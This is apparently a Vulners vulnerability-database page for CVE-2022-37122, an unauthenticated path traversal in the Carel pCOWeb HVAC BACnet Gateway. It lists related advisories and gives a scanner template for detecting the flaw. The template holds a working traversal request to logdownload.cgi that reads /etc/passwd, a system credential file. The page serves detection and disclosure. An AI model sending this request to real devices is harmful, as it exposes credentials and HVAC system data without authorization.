| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Exploit for Path Traversal in Carel Pcoweb_Card_Firmware | 12 Oct 202502:01 | ā | githubexploit | |
| CVE-2022-37122 | 31 Aug 202216:15 | ā | attackerkb | |
| CVE-2022-37122 | 31 Aug 202220:43 | ā | circl | |
| Carel pCOWeb HVAC BACnet Gateway č·Æå¾éåę¼ę“ | 31 Aug 202200:00 | ā | cnnvd | |
| CVE-2022-37122 | 31 Aug 202215:47 | ā | cve | |
| CVE-2022-37122 | 31 Aug 202215:47 | ā | cvelist | |
| EUVD-2022-39775 | 31 Aug 202215:47 | ā | euvd | |
| CVE-2022-37122 | 31 Aug 202216:15 | ā | nvd | |
| CVE-2022-37122 | 31 Aug 202216:15 | ā | osv | |
| Directory traversal | 31 Aug 202216:15 | ā | prion |
| Source | Link |
|---|---|
| zeroscience | www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php |
| zeroscience | www.zeroscience.mk/codes/carelpco_dir.txt |
| packetstormsecurity | www.packetstormsecurity.com/files/167684/ |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2022-37122 |
id: CVE-2022-37122
info:
name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Path Traversal
author: gy741
severity: high
description: |
Carel pCOWeb HVAC BACnet Gateway 2.1.0 contains an unauthenticated arbitrary file disclosure caused by improper verification of the 'file' GET parameter in logdownload.cgi, letting attackers disclose sensitive files via directory traversal, exploit requires no authentication.
impact: |
Unauthenticated attackers can read arbitrary files from the Carel pCOWeb HVAC BACnet Gateway through directory traversal in the logdownload.cgi file parameter, potentially exposing sensitive configuration files, credentials, and HVAC system data.
remediation: |
Update Carel pCOWeb HVAC BACnet Gateway to a version later than 2.1.0 that properly validates file paths in logdownload.cgi.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php
- https://www.zeroscience.mk/codes/carelpco_dir.txt
- https://packetstormsecurity.com/files/167684/
- https://nvd.nist.gov/vuln/detail/CVE-2022-37122
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-37122
cwe-id: CWE-22
epss-score: 0.19669
epss-percentile: 0.97069
metadata:
max-request: 1
vendor: carel
product: pcoweb_hvac_bacnet_gateway
tags: cve,cve2022,carel,lfi,traversal,unauth,bacnet,vuln
http:
- method: GET
path:
- "{{BaseURL}}/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd"
matchers:
- type: regex
regex:
- "root:.*:0:0:"
# digest: 4a0a004730450220223790bf64f57bfd3e596d22855d30a07b50fbffadaefa01aea5e4cf1c86885d0221009da827608b16a126430a68f1ba6fb97887972546123c89848a0f1f832f2f8de6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation